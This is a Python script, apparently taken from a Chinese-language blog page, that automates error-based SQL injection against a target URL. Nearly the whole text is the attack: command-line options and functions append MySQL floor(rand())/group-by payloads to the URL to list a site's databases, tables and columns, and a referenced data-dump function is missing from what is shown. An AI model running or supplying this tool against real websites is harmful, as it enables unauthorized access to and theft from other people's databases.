1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99
|
#!/usr/bin/env python3 # -*- coding: utf-8 -*-
from optparse import OptionParser import sys import requests import re
parser=OptionParser()
parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases") parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table") parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column") parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")
(options,args) = parser.parse_args()
def main(): if options.url == None and options.database == None and options.table == None and options.column == None: print("Please read the help") parser.print_help() sys.exit() elif options.url != None and options.database ==None and options.table == None and options.column == None: get_all_databases(options.url) elif options.url != None and options.database !=None and options.table == None and options.column == None: get_db_all_tables(options.url,options.database) elif options.url != None and options.database !=None and options.table != None and options.column == None: get_db_tb_all_columns(options.url,options.database,options.table) elif options.url != None and options.database !=None and options.table != None and options.column != None: getAllContent(options.url,options.database,options.table,options.column)
def http_get(url): result = requests.get(url) return result.text
def get_all_databases(url): db_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" # print(db_nums_payload) html = http_get(db_nums_payload) # print(html) result = re.search(r'~(.*?)~',html,re.S|re.I) # print(result) db_nums = int(result.group(1)) print("数据库的个数为:%d" % db_nums)
for x in range(db_nums): db_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select schema_name from information_schema.schemata limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % x html = http_get(db_name_payload) # print(html) result = re.search(r'~(.*?)~',html,re.S|re.I) db_name = result.group(1) print("第%d个数据库为:%s" % (x+1,db_name))
def get_db_all_tables(url,database): tb_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % database # print(tb_nums_payload)
html = http_get(tb_nums_payload) # print(html)
result = re.search(r'~(.*?)~',html,re.S|re.I)
tb_nums = int(result.group(1)) print(database,"数据库中表的个数为:%d" % tb_nums)
for x in range(tb_nums): tb_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,x) # print(tb_name_payload) html = http_get(tb_name_payload) # print(html) result = re.search(r'~(.*?)~',html,re.S|re.I) tb_name = result.group(1) print(database,"数据库第%d个数据库为:%s" % (x+1,tb_name))
def get_db_tb_all_columns(url,database,table): co_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table) html = http_get(co_nums_payload) #print(html)
result = re.search(r'~(.*?)~',html,re.S|re.I) co_nums = int(result.group(1)) # print(co_nums) print("%s数据库中的%s表里面的字段个数为:%d" % (database,table,co_nums))
for x in range(co_nums): co_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table,x) html = http_get(co_name_payload) result = re.search(r'~(.*?)~',html,re.S|re.I) co_name = result.group(1) print("%s数据库中%s表中的第%d个字段为:%s" % (database,table,x+1,co_name))
if __name__ == '__main__': main()
|
近期评论